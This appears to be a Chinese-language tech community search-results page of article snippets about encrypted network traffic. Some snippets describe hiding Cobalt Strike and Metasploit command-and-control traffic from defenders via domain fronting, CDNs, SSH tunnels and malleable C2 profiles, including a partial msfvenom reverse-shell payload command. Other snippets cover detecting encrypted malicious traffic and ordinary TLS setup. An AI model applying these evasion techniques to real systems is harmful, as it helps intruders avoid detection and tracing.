- 综合排序
- 最热优先
- 最新优先
- 来自专栏红蓝对抗
流量加密之C2隐藏
所以我们需要加密流量保护CS服务器以免被防守方的安全监控检测出来甚至溯源我们的CS服务器,目前常用的隐藏手段包括域前置、CDN、云函数等,接下来我将介绍这几种常见的隐藏C2的方式。 CS 服务器定制 malleable C2 以用于隐藏流量。 与云函数类似,域前置技术主要通过CDN节点将流量转发给真实的C2服务器,CDN节点ip可通过识别请求的Host头进行流量转发,利用我们配置域名的高可信度,那么就可以有效躲避针对DLP、agent等流量监测 WireShark 抓包在 WireShark 中跑的都是TLS加密流量、目的地址为随机的CDN节点,因此无法溯源到我们C2服务器的真实IP0x03 总结通过这段时间针对流量加密的学习,我发现网络攻击与防守总是在不断转换 ,就像CDN在设计之初主要用于保护网站的真实IP,但作为攻击者我们也可以使用它来保护我们的C2服务器;而使用OpenSSL生成的RSA证书除了身份验证以外也能够帮助攻击者加密流量、隐藏通信。
13.4K111编辑于 2022-06-21 - 来自专栏HACK学习
红队 | 流量加密:使用OpenSSL进行远控流量加密
可看到未加密的情况下,攻击机与目标机之间的通信都是明文传输的,所以流量设备可以很容易地查看到攻击者的行为记录的。 那么接下来将演示如何使用OpenSSL对nc进行流量加密。 1. 成功生成后,在桌面有两个pem加密文件: ? 2. Metasploit 流量加密 实验环境:Kali Linux 攻击 Windows 10 Metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来,所以做好流量加密,就能避免审计工具检测出来 下面开始演示如何对 Metasploit 进行流量加密。 2. 创建 C2-profile 文件 C2-profile 文件是 Cobalt Strike 内置工具,用于控制 Cobalt Strike 流量,可以防止安全设备对流量特征进行监控和拦截。
3.8K41发布于 2021-05-14 - 来自专栏网络安全随笔
加密流量识别技术
根据最新统计报告[3],截止 2017 年 2 月,半数的在线流量均被加密。对于特定类型的流量,加密甚至已成为法律的强制性要求,Gartner 预测到2021 年,83%的流量将被加密。 加密流量识别什么加密与未加密流量,识别出哪些流量属于加密的,剩余则是未加密的识别加密流量所采用的加密协议,如 QUIC,SSL,SSH,IPSec识别流量所属的应用程序,如Skype,Bittorrent ,YouTube,谷歌搜索,淘宝网,凤凰网或中国银行等异常流量识别就是识别出 DDoS,APT,Botnet 等恶意流量内容参数识别就是对应用流量从内容参数上进一步分类,如视频清晰度,图片格式加密流量识别方法概览加密流量识别的首要任务是根据应用需求确定识别对象及识别粒度 加密流量识别研究内容如图 2-1 所示,加密流量识别方法主要包括六类:基于负载随机性检测的方法、基于有效负载的分类方法、基于数据包分布的分类方法、基于机器学习的分类方法、基于主机行为的分类方法,以及多种策略相结合的混合方法 (如FTP 和 P2P)以及识别最终用户的应用(如 BitTorrent 和 Skype),Deep Packet 不仅可以识别加密流量,还可以区分 VPN 和非 VPN 流量,应用识别的 F1-score
1.4K10编辑于 2024-03-20 - 来自专栏深度学习|机器学习|歌声合成|语音合成
恶意加密流量- pcap包解析
0xa1b2c3d4用来表示按照原来的顺序读取,0xd4c3b2a1表示下面的字节都要交换顺序读取。考虑到计算机内存的存储结构,一般会采用0xd4c3b2a1,即所有字节都需要交换顺序读取。 Major:2Byte: 当前文件主要的版本号,一般为 0x0200【实际上因为需要交换读取顺序,所以计算机看到的应该是 0x0002】 Minor:2Byte: 当前文件次要的版本号,一般为 0x0400 # Global Header e5da c850 fbdc 0800 2a00 0000 2a00 0000 # Packet Header ffff ffff ffff 0000 0000 0000 7f00 0001 0102 0304 0000 0003 # Packet Data f3da c850 250c 0100 2a00 0000 2a00 c850 7952 0500 2a00 0000 2a00 0000 # Packet Header ffff ffff ffff 0000 0000 0000 0800 4500 001c 2710
3.3K10编辑于 2022-10-05 - 来自专栏kali blog
kali中对msf流量加密
并没有加密,传输内容容易被检测和发现。 如下,我们简单生成一个Android平台的shell。 加密msf流量 创建证书 openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London 这样会在桌面生成一个www.bbskali.cn.pem的证书 生成加密的shell msfvenom -p windows/meterpreter/reverse_winhttps LHOST= 发现流量全是密文了。
1.2K50编辑于 2022-04-20 - 来自专栏云计算教程系列
使用Apache或Nginx加密Tomcat流量
在默认情况下安装时,Tomcat服务器与客户端之间的所有通信都是未加密的,包括输入的任何密码或任何敏感数据。我们可以通过多种方式将SSL合并到Tomcat的安装中。 Tomcat本身也能够加密本地连接,我们是不是有点画蛇添足,多此一举呢? 自签名证书提供了相同类型的加密,但没有域名验证公告。关于自签名证书,你可以参考为Apache创建自签名SSL证书和如何为Nginx创建自签名SSL证书这两篇文章。 现在输入以下命令打开文件: sudo vi /etc/httpd/conf.d/ssl.conf 在VirtualHost配置块内部,添加一个JkMount指令,将该虚拟主机接收的所有流量传递给我们刚定义的 结论 现在你可以在Web服务器代理的帮助下使用SSL加密Tomcat连接。虽然配置单独的Web服务器进程可能会增加服务应用程序所涉及的软件,但它可以显着简化SSL部署保护流量的过程。
2.1K60发布于 2018-08-01 - 来自专栏Tensorbytes
https加密协议流量劫持尝试
由越来越多的网页信息改为HTTPS 加密协议,传统的运营商基于DPI的数据获取和广告营销方式已经不可行,需要一种新的方式采集可用数据。 相对网页版,手机版的加密信息相对少些,因此可以以手机版本作为切入,获取用户部分信息。 实验结果: ? (2)让浏览器加入特定的根证书实现网络劫持。 导入受信人根证书到浏览器中,劫持客户端向服务器发送的请求,利用受信任证书进行解密。 ? 实验结果: ?
1.2K20发布于 2019-10-23 - 来自专栏用户7692554的专栏
渗透测试|CobaltStrike配置C2-profile文件【加密流量实现免杀】
tryblog -keyalg RSA -validity 36500 -keystore tryblog.store 温馨提示 注意记得-alias后面的参数和-keystore后面的参数后面会用到C2- 证书就在当前目录下 创建C2.profile文件 1.新建一个文件,名叫c2.profile,加入以下内容 set sample_name "tryblog POS Malware"; set sleeptime /c2lint C2.profile #命令后面跟你自己的c2文件 这样就基本成功了。 使用证书启动teamserver nohup . /C2.profile & #nohup就是把程序挂在后台运行 温馨提示 建议编辑teamserver文件,在最后把启动的端口修改一下,尽量别使用默认端口启动。 这个只是把流量进行加密,然后你要免杀的话还是要生成payload自己进行免杀的,不过这样以后免杀的效果会好很多,就这样吧,有什么问题欢迎进群讨论。
5.3K20编辑于 2022-09-08 - 来自专栏绿盟科技研究通讯
加密恶意流量优秀检测思路分享
本文介绍一种从加密流量中检测恶意流量的方法,来自清华大学的HawkEye战队,他们在DataCon2020大赛中获得加密恶意流量检测方向的一等奖,该方法的思路具有很好的借鉴作用,希望带给读者一些思考。 由于数据包体量特征不受数据加密的影响,所以非常适合用于加密流量的检测。 ? 图2 恶意/正常通信中数据包长度的区别 将所有可能的带方向的报文长度作为包长分布特征的一个维度,考虑到带方向的报文长度的所有可能值是从64字节到1500字节,所以包长分布特征是一个约3000维的概率分布向量 四、小结 本文介绍了一种加密恶意流量检测方法,首先通过对加密流量进行深入分析和特征挖掘,提取了单维/多维特征,然后对包级/流级/主机级流量行为进行分层分析和学习,构建不同的分类器,最终通过多模型投票机制提升了检测效率和性能 加密代理篇: 《初探加密流量识别》 恶意软件篇: 《基于深度学习的物联网恶意软件家族细粒度分类研究》 《关于恶意软件加密流量检测的思考》 加密webshell篇: 《【冰蝎全系列有效】针对HTTPS加密流量的
3.3K20发布于 2021-02-24 - 来自专栏黑伞安全
干货--加密流量APP的渗透准备
又是喜闻乐见的加密流量!搞它。 APP是加壳的,先上frida-dexdump脱壳。 ? ? 这么多有encrypt关键字的,不好找,我们上DDMS: 通过profilling,我们很容易就能定位到加密函数: ? 上JEB,打开我们已经脱掉的dex文件: ? 恩,剩下的就是写脚本了。1. 为方便测试,我们使用burpy,这样就能直接在burpsuite上操作加密解密了。2. 为方便burpy调用加密和解密,需要把hook写成rpc的形式。
1.4K50发布于 2021-01-29 - 来自专栏FreeBuf
Shellcode与加密流量之间的那些事儿
而类似SHA-2和分组密码(例如Blowfish)这样加密哈希函数也并不是为类似RFID芯片这样的占用资源较少的电子设备设计的。 分组密码 分组密码有很多种,但AES 128可能是目前最适合对在线流量进行加密的算法了,下面给出的是我们对不同种类分组密码的测试结果: ? 虽然这些加密算法都非常优秀,但是他们仍需要类似计数器(CTR)和基于认证的加密模块,其中最适合消息认证码(MAC)的加密算法就是LightMAC了,因为它在实现加密的过程中使用的是相同的分组密码。 这里我们选择使用Gimli,因为它占用资源最少,并且可以用来构造针对通信流量的加密算法。 异或密码 接下来,我们实现一个针对数据流的简单异或操作(Just For Fun!)。 &c1 : &c2; crypt(c); } 总结 对shellcode进行恢复之后,将能够得到明文数据,因为我在这里加密所采用的是一个静态密钥
94620发布于 2018-09-21 - 来自专栏绿盟科技研究通讯
关于恶意软件加密流量检测的思考
随着TLS的使用越来越普遍、有效证书的获取越来越廉价和容易,使用TLS的恶意软件也会越来越多,所以检测出恶意软件的TLS加密通信流量是非常必要的。 图1 源端口特征分布 (2)目的端口:默认情况下,合法的服务器在特定的端口上如443、465、853、992等监听TLS相关的数据包,除了恶意软件,客户端没有理由发起TLS会话到其他端口,但一些恶意软件作者可能只想使用加密 图2 目的端口特征分布 (3)字节熵:熵值的大小通常取决于加密的强弱,一般认为恶意软件流可能由于忽略数据包的加密而具有较小的熵值,但实际情况恰恰相反,良性流具有较小的熵值,如图3所示,横坐标表示恶意流和良性流 (2)时间 相比良性流量,时间的偏差对恶意流量的影响更大一些,收集到的数据会受到概念漂移的影响,这意味着数据会随着时间的推移而过时,恶意软件不断优化更新、新的恶意软件被引入、用户习惯产生变化等,训练好的模型的可用性在时间上是有限的 加密代理篇: 《初探加密代理识别》 恶意软件篇: 《基于深度学习的物联网恶意软件家族细粒度分类研究》 加密webshell篇: 《【冰蝎全系列有效】针对HTTPS加密流量的webshell检测研究》 《
2.2K30发布于 2021-01-27 - 来自专栏FreeBuf
利用SSH隧道加密、隐蔽C&C通信流量
众多厂商和企业对网络流量进行恶意流量分析检测,从而针对性的采取防御措施,如各级ISP在骨干网络设备上大多采用网络流量分析检测的防御方案。 本文想通过标准的SSH的端口转发建立SSH形式的加密隧道,用于加密、隐蔽传输恶意流量,从而避免通过流量检测发现恶意行为。复现实验部分以C&C通信流量为例进入实验。 通过SSH隧道进行加密和隐藏的C&C流量在外部流量特征分析仅表现为标准SSH流量。 ? 二、实验原理 本次实验使用Empire工具快速搭建C&C信道,本文只简要介绍对于Empire工具。 SSH 端口转发能够提供两大功能:1、加密 SSH Client 端至 SSH Server 端之间的通讯数据。2、突破防火墙的限制完成一些之前无法建立的 TCP 连接。 (2) 使用工具(如Empire、Metasploit等)构建C&C。 (3) 利用SSH的端口转发搭建SSH隧道。 (4) 配置C&C和SSH参数使二者配合实现加密、隐藏恶意流量的目的。
2.5K10发布于 2019-07-22 - 来自专栏软件测试技术
如何通过LoadRunner测试MQTT协议、实现加密流量测试
二、LoadRunner加密流量测试在使用LoadRunner进行性能测试时,如果被测系统使用了加密流量要求通过 SSL/TLS 加密通道进行通信,LoadRunner通过支持SSL/TLS 协议对流量进行加密测试 LoadRunner 支持在性能测试中配置 SSL/TLS 协议,以模拟加密流量。 测试人员可以配置虚拟用户脚本,通过加密的通信通道进行数据交换。2)设置SSL证书:测试人员需要配置有效的SSL 证书,确保模拟的通信能够通过加密通道进行。 LoadRunner 支持自定义证书或使用现有证书进行加密流量测试。1)设置 CA 和 TLS 证书2)确定系统中哪台计算机是用于客户端服务器通信的服务器。 在进行加密流量测试时,LoadRunner 还可以结合其他安全性测试,确保系统的安全性和性能。加密流量的测试不仅仅是验证通信的安全性,还需要评估加密和解密操作对系统性能的影响。
14410编辑于 2026-03-25 - 来自专栏HACK学习
红蓝对抗——加密Webshell“冰蝎” 流量 100%识别
0X01 "冰蝎" 获取密钥过程 冰蝎执行流程 (图片来自红蓝对抗——加密Webshell“冰蝎”攻防) 冰蝎在连接webshell的时,会对webshell进行两次请求访问 为什么进行两次访问? Path 或者 HttpOnly 之类或者其它的) 冰蝎直接把返回协议头中的Set-Cookie字段直接添加到下一个请求包的Cookie字段中 正常的请求是不会携带Cookie属性的,这可是识别冰蝎流量最直接的一种办法 0X03 "冰蝎" 动态加载 冰蝎动态加载的原理就是每次都发送一个class字节码(其它语言也一样) 冰蝎通过asm动态修改class字节码变量内容,实现携带参数动态执行,冰蝎在获取完密钥之后(2个请求 服务器的一些信息),冰蝎的BasicInfo功能并没有动态修改参数(一个获取服务器信息的能有啥参数),这会导致每次获取BasicInfo的数据包都是固定的大小 0X04 总结 Waf可以对一个ip连续访问2次的数据包进行截取 ,比对相同字符,比对之后,截取两次不同的数据,如果剩下的是16位的key,就可以证明这两个数据包就是冰蝎发出的,第三个数据包通过 0x02,0x03 中的一些bug,可以100%的匹配到冰蝎流量,不会误报
1.3K10发布于 2020-04-27 - 来自专栏AI科技评论
WWW`22丨中科院信工所提出:面向多场景低资源加密流量分类的加密流量预训练技术
论文链接:https://arxiv.org/abs/2202.06335 代码链接:https://github.com/linwhitehat/ET-BERT 2 背景介绍 近十年间,伴随网络传输协议加密化的发展 因此,研究者认为: 现有挖掘加密流量特征的模型并没有考虑到加密流量在不同场景下都具有流量的共性特征,在流量表征过程只关注单一场景; 现有引入预训练架构的模型没有从深层次发掘和利用流量的传输行为对区分不同应用的关联关系 表2和表3中报告了具体的结果。 2、消融实验 研究者对该研究进行消融实验,以了解ET-BERT中具有和不具有单个模块与处理模式的影响。如表4所示,研究者选择了学术界引用较多的ISCX-VPN数据集作为消融实验数据来源。 (2)结果可视化对比的质量 如图5所示,研究者通过分类结果的可视化展示ET-BERT的性能表现出色,在多类别的样本类内距离以及类间距离的边界识别更加清晰,对于流量特征近似的类别也能够保持较低的错检率。
2.2K20编辑于 2022-03-17 - 来自专栏charlieroro
流量控制--2.传统的流量控制元素
延迟报文作为流量控制解决方案的一部分,使得每种整流机制都变成了一种不会节省工作量的机制,即"为了延迟报文需要作额外的工作"。 整流器会尝试限制或分配流量,使其满足但不会超过配置的速率(通常为每秒报文数或每秒的比特/字节数)。也正是因为其运作机制,整流器可以使突发流量变得平滑。对带宽进行整流的好处是可以控制报文的延迟。 Linux模型(参见Section 4.3, “filter”)允许报文在流量控制结构中级联多个分类器,并与策略器一起进行分类(另请参见Section 4.5, “policer”) 3.4 策略 策略器用于衡量或限制特定队列的流量 策略是流量控制的一个元素,是一种限制流量的简单机制。策略广泛运用到网络边界,用于保证对端占用的带宽不会超配额。一个策略器会以一定的速率接收流量,当超过该速率之后会执行某些动作。 一个比较严格的方案是直接丢弃流量(虽然流量可以通过重新分类进行处理,而不用简单地丢弃)。
1.1K10发布于 2020-11-24 - 来自专栏云计算教程系列
如何在Ubuntu 16.04上使用Stunnel加密流量到Redis
Redis不提供自己的任何加密功能。它的运作假设它已部署到隔离的专用网络,只能由可信方访问。如果您的环境与该假设不匹配,则必须单独将Redis流量包装在加密中。 在本教程中,我们将演示如何使用名为stunnel的安全隧道程序加密Redis流量。Redis客户端和服务器之间的流量将通过专用的SSL加密隧道进行路由。 您可以在下面看到一个示例: Redis server output. . . ----- Country Name (2 letter code) [AU]:US State or Province 我们希望通过accept将流量加密到Redis服务器外部IP地址上的默认Redis端口(端口6379)。然后我们希望通过connect将流量传输到本地接口上的默认Redis端口以存储解密的流量。 要允许所有流量到端口6379,请输入: sudo ufw allow 6379 这将打开对stunnel正在侦听的公共接口上的端口6379的访问。该stunnel端口仅接受加密流量。
3K40发布于 2018-09-27 - 来自专栏绿盟科技研究通讯
【顶会论文分享】未知模式加密恶意流量实时检测
现如今,大多数加密流量检测方法都依赖于已知攻击的先验知识,而无法检测未知模式的攻击。 模型框架 通常情况下,加密恶意流量与良性流量流的特征极其相似,而在攻击者与受害者交互模式中出现的恶意行为与良性行为差异较为明显。 由于网络中大多数数据包都存在在长流中,而短流信息量较少且数量较多,因此将流量分为长流和短流进行处理。具体信息如图2。 将实验中使用的80个新数据集分为四组,其中三组是加密的恶意流量:(1)传统的蛮力攻击。(2)加密泛洪流量。(3)加密web恶意流量。(4)恶意软件生成加密流量。 表1 数据集的平均精确度 另外,无论对于传统攻击流量,加密泛洪流量,加密网络流量,恶意软件流量,Hypervision都获得了比其他五组基线准确率获得一定程度的提高. 4.3 吞吐量评估 图5展示的是图检测的吞吐量信息
5K20编辑于 2023-10-09 - 来自专栏大大刺猬
SSH端口转发2, 转发https流量.
ssh 用法 man ssh #查看帮助文档最快 2020-07-06_140540.png 看起来比较麻烦,我都总结如下 ssh -R [HOST_1_IP]:HOST_1_PORT:HOST_2_ IP:HOST_2_PORT HOST_1_IP[:HOST_1_PORT] -Nf 解释(参考图一): -R 关键词 -Nf 后台启用,不打开shell HOST_1_IP 拥有公网IP 的服务器(SERVER_A) HOST_1_PORT 拥有公网IP的服务器(SERVER_A)的端口 HOST_2_IP 私网服务器的IP(SERVER_C) HOST_2_PORT 154513.png 测试: 访问https://129.28.x.x 2020-07-06_154839.png 2020-07-06_154939.png 总结: ssh本质上是转发的tcp流量 , haproxy也是转发的tcp流量, 所以ssl认证是内网服务器和客户端进行的.
4.7K30发布于 2020-07-06
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号